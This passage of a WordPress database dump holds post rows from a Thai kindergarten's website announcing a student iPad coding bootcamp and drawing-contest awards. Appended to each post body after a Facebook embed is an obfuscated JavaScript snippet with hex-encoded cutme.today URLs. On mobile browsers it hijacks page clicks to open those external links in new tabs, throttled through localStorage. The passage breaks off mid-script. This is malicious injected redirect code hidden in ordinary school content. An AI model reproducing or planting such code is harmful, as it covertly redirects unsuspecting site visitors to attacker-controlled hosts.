(99,1,'2024-07-29 18:35:58','2024-07-29 11:35:58','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid023eBb281c8Fow3R13F6zCc7EMU2mWEEyzr9TXHucesMAJ2pTr3wLbGM3xitBxsmcil%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"786\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต นำนักเรียนเข้าร่วมกิจกรรม Si Sa Ket Bootcamp ซึ่งจัดโดย Swift Coding Club TH ร่วมกับสมาคมกีฬาแห่งจังหวัดศรีสะเกษ และ หอการค้าจังหวัดศรีสะเกษ เพื่อให้เด็ก ๆ ได้สัมผัสประสบการณ์จริงในการสร้าง iOS app บน iPad','','inherit','closed','closed','','96-revision-v1','','','2024-07-29 18:35:58','2024-07-29 11:35:58','',96,'http://watprato.ssk.in.th/?p=99',0,'revision','',0),
(100,1,'2024-07-29 18:40:14','2024-07-29 11:40:14','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid0nR7MfMDyL3xPshTEi7q2Ype79C8BXtfuFCPQVTEHrcKKr5pAGAUJTU6HRp7pibuel%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"830\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับคุณครูและนักเรียนผู้ได้รับรางวัลการประกวดวาดภาพในโครงการส่งเสริมพระพุทธศาสนาเนื่องในวันอาสาฬหบูชาและวันเข้าพรรษา','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82%e0%b8%95-2','','','2024-07-29 18:40:15','2024-07-29 11:40:15','',0,'http://watprato.ssk.in.th/?p=100',0,'post','',0),
(101,1,'2024-07-29 18:39:55','2024-07-29 11:39:55','','452420753_122164291130202781_6266995543246923356_n','','inherit','open','closed','','452420753_122164291130202781_6266995543246923356_n','','','2024-07-29 18:39:55','2024-07-29 11:39:55','',100,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/452420753_122164291130202781_6266995543246923356_n.jpg',0,'attachment','image/jpeg',0),
(102,1,'2024-07-29 18:40:14','2024-07-29 11:40:14','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3Dpfbid0nR7MfMDyL3xPshTEi7q2Ype79C8BXtfuFCPQVTEHrcKKr5pAGAUJTU6HRp7pibuel%26id%3D61556083436494&show_text=true&width=500\" width=\"500\" height=\"830\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else 